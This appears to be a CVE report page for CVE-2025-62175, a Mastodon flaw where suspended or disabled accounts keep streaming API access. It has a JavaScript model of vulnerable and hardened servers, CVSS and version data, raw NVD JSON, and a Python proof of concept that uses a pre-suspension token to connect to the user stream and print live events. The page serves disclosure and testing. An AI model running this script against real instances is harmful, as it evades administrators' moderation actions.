Security Vulnerability Report
CVE-2025-62175 CVSS 4.3 MEDIUM

Published: 2025-10-13 21:15:35
Last Modified: 2025-10-20 17:19:58

Description

Mastodon is a free, open-source social network server based on ActivityPub. In versions before 4.4.6, 4.3.14, and 4.2.27, disabling or suspending a user account does not disconnect the account from the streaming API. This allows disabled or suspended accounts to continue receiving real-time updates through existing streaming connections and to establish new streaming connections, even though they cannot interact with other API endpoints. This undermines moderation actions, as administrators expect disabled or suspended accounts to be fully disconnected from the service. This issue has been patched in versions 4.4.6, 4.3.14, and 4.2.27. No known workarounds exist.
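
The gap the advisory describes is a session-revocation problem rather than a token-validation one: the streaming server authorizes a bearer token when the socket is opened and never revisits the account's moderation state, so neither a suspension applied after connect nor a fresh connect with the same still-valid token is refused. The JavaScript below is an added, in-memory model written for this page, not code from Mastodon (whose streaming API is served by a separate Node.js process); `createStreamingServer`, `runScenario`, the token and account tables and the 4401/4403 close codes are all hypothetical. With `hardened: false` it reproduces the vulnerable behaviour; with `hardened: true` it applies the two checks the advisory says the patched versions have: reject new connections from disabled or suspended accounts, and close live connections when the account is suspended.

```javascript
// Added example for this page; not Mastodon's code. All names are hypothetical.
// In-memory model of a streaming server with and without the account-state
// checks that close the gap described in CVE-2025-62175.

// Constructed sample data: bearer tokens and the accounts they resolve to.
const SAMPLE_TOKENS = new Map([
  ['tok-alice', 'alice'],
  ['tok-mallory', 'mallory'],
]);
function sampleAccounts() {
  return new Map([
    ['alice', { disabled: false, suspended: false }],
    ['mallory', { disabled: false, suspended: false }],
  ]);
}

// Minimal stand-in for a WebSocket: records what it received and how it was closed.
function makeSocket() {
  return {
    open: true,
    closeCode: null,
    received: [],
    send(event) { if (this.open) this.received.push(event); },
    close(code) { this.open = false; this.closeCode = code; },
  };
}

// An account may use the service only if it is neither disabled nor suspended.
function accountIsFunctional(acct) {
  return Boolean(acct) && !acct.disabled && !acct.suspended;
}

// hardened=false reproduces the vulnerable behaviour: the token is resolved once
// at connect time, the account's moderation state is never consulted, and a
// later suspension leaves already-open sockets subscribed.
function createStreamingServer({ hardened }) {
  const accounts = sampleAccounts();
  const connections = new Map(); // accountId -> Set of live sockets

  function connect(token, socket) {
    const accountId = SAMPLE_TOKENS.get(token);
    if (!accountId) {
      socket.close(4401); // hypothetical close code: unknown token
      return false;
    }
    if (hardened && !accountIsFunctional(accounts.get(accountId))) {
      socket.close(4403); // hypothetical close code: account disabled/suspended
      return false;
    }
    if (!connections.has(accountId)) connections.set(accountId, new Set());
    connections.get(accountId).add(socket);
    return true;
  }

  // Deliver a real-time event to every live subscriber.
  function publish(event) {
    for (const sockets of connections.values()) {
      for (const socket of sockets) socket.send(event);
    }
  }

  // Moderation action. The hardened server also tears down the account's live
  // streams, which is the behaviour the advisory attributes to the patched
  // versions. Returns the number of sockets closed.
  function suspend(accountId) {
    accounts.get(accountId).suspended = true;
    if (!hardened) return 0;
    const sockets = connections.get(accountId) || new Set();
    for (const socket of sockets) socket.close(4403);
    connections.delete(accountId);
    return sockets.size;
  }

  function liveConnections(accountId) {
    return (connections.get(accountId) || new Set()).size;
  }

  return { connect, publish, suspend, liveConnections };
}

// Replay the advisory's scenario: connect, get suspended, observe what leaks.
function runScenario(hardened) {
  const server = createStreamingServer({ hardened });
  const existing = makeSocket();
  server.connect('tok-mallory', existing);   // opened while in good standing
  const closed = server.suspend('mallory');  // admin suspends the account
  server.publish('update');                  // an event published afterwards
  const fresh = makeSocket();
  const reconnected = server.connect('tok-mallory', fresh); // new attempt, same token
  return {
    closedOnSuspend: closed,
    existingSocketOpen: existing.open,
    eventsLeaked: existing.received.length,
    newConnectionAccepted: reconnected,
    liveAfter: server.liveConnections('mallory'),
  };
}

console.log('vulnerable:', runScenario(false));
console.log('hardened:  ', runScenario(true));
```

Running the file prints the two result objects side by side: the vulnerable server keeps the old socket open, delivers the post-suspension event to it and accepts the reconnect, while the hardened server closes the old socket on suspension and refuses the new one. The point to carry over to a real deployment is that disabling or suspending an account has to be an event that tears down existing sessions on every service that holds one, not only a flag consulted by REST endpoints.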

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Read: reachable over the network with low complexity and no user interaction, but only by a party holding a still-valid access token for the disabled or suspended account (PR:L); the impact is continued read access to real-time updates (C:L) with no integrity or availability effect, which is why the score stays at 4.3 despite the moderation bypass.
Weaknesses (CNA): CWE-273 (Improper Check for Dropped Privileges), CWE-274 (Improper Handling of Insufficient Privileges)

Configurations (Affected Products)

cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* (Mastodon < 4.2.27) - VULNERABLE
cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* (Mastodon 4.3.0 - 4.3.13) - VULNERABLE
cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* (Mastodon 4.4.0 - 4.4.5) - VULNERABLE
Fixed in: 4.2.27, 4.3.14, 4.4.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62175 PoC - Mastodon Streaming API Access Control Bypass
# This PoC demonstrates that disabled/suspended accounts can still
# connect to the Streaming API after being banned.
#
# Requires: pip install websocket-client requests
import json
from urllib.parse import urlsplit

import requests
import websocket

# Configuration
MASTODON_INSTANCE = "https://your-mastodon-instance.com"
ACCESS_TOKEN = "YOUR_ACCESS_TOKEN_BEFORE_BAN"  # Token obtained before account suspension
STREAM_TIMEOUT = 10  # seconds to wait for events before giving up


def streaming_url():
    """Build the WebSocket URL for the user stream from the instance's HTTPS URL."""
    host = urlsplit(MASTODON_INSTANCE).netloc
    return f"wss://{host}/api/v1/streaming/?stream=user"


def connect_to_streaming_api():
    """
    Connect to the Mastodon Streaming API using a token from a disabled/suspended account.
    Expected behavior (patched): the WebSocket handshake is rejected.
    Actual behavior (vulnerable): the connection succeeds and receives real-time updates.
    """
    headers = {"Authorization": f"Bearer {ACCESS_TOKEN}"}
    try:
        ws = websocket.create_connection(streaming_url(), header=headers)
        print("[+] Successfully connected to Streaming API with suspended account token!")
        print("[+] This indicates CVE-2025-62175 vulnerability is present.")
        # Listen for incoming messages for a few seconds
        ws.settimeout(STREAM_TIMEOUT)
        while True:
            try:
                message = ws.recv()
            except websocket.WebSocketTimeoutException:
                print("[*] No more events received within timeout.")
                break
            except websocket.WebSocketConnectionClosedException:
                print("[*] Server closed the stream.")
                break
            try:
                data = json.loads(message)
            except ValueError:
                data = message  # non-JSON frame; show it raw
            print(f"[+] Received stream event: {data}")
        ws.close()
        return True
    except websocket.WebSocketBadStatusException as e:
        print(f"[-] Connection rejected (expected on patched versions): {e}")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


def verify_account_status():
    """Check via the REST API whether the account is suspended or disabled."""
    headers = {"Authorization": f"Bearer {ACCESS_TOKEN}"}
    response = requests.get(
        f"{MASTODON_INSTANCE}/api/v1/accounts/verify_credentials",
        headers=headers,
        timeout=15,
    )
    if response.status_code == 403:
        print("[+] Account is confirmed suspended/disabled via REST API.")
        return True
    if response.status_code == 200:
        print("[!] Account is still active.")
        return False
    print(f"[?] Unexpected status: {response.status_code}")
    return None


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-62175 - Mastodon Streaming API Bypass PoC")
    print("=" * 60)
    # Step 1: Verify account is suspended via REST API
    is_suspended = verify_account_status()
    if is_suspended:
        # Step 2: Attempt to connect to Streaming API (should fail on patched versions)
        print("\n[*] Attempting Streaming API connection with suspended token...")
        if connect_to_streaming_api():
            print("\n[!] VULNERABLE: Streaming API connection succeeded despite account suspension!")
        else:
            print("\n[+] NOT VULNERABLE: Streaming API correctly rejected the connection.")
    elif is_suspended is None:
        print("\n[*] Could not determine account status; check the token and instance URL.")
    else:
        print("\n[*] Account is not suspended. Suspend the account first to test.")

References

https://github.com/mastodon/mastodon/security/advisories/GHSA-r2fh-jr9c-9pxh (Vendor Advisory)
https://github.com/mastodon/mastodon/commit/2971ac9863b91372e68ac152caf6f4dbff511d17 (Patch)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-62175",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-13T21:15:34.930",
    "lastModified": "2025-10-20T17:19:58.210",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Mastodon is a free, open-source social network server based on ActivityPub. In versions before 4.4.6, 4.3.14, and 4.2.27, disabling or suspending a user account does not disconnect the account from the streaming API. This allows disabled or suspended accounts to continue receiving real-time updates through existing streaming connections and to establish new streaming connections, even though they cannot interact with other API endpoints. This undermines moderation actions, as administrators expect disabled or suspended accounts to be fully disconnected from the service. This issue has been patched in versions 4.4.6, 4.3.14, and 4.2.27. No known workarounds exist."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-273" },
          { "lang": "en", "value": "CWE-274" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "4.2.27",
                "matchCriteriaId": "5AFD1281-DEE1-421D-B62B-8D9727428763"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.3.0",
                "versionEndExcluding": "4.3.14",
                "matchCriteriaId": "CE867F92-59FF-4768-974B-D4BDF71B1FFA"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.4.0",
                "versionEndExcluding": "4.4.6",
                "matchCriteriaId": "6F6F2EB3-8C86-417E-8D7B-499438B63D61"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/mastodon/mastodon/commit/2971ac9863b91372e68ac152caf6f4dbff511d17",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/mastodon/mastodon/security/advisories/GHSA-r2fh-jr9c-9pxh",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}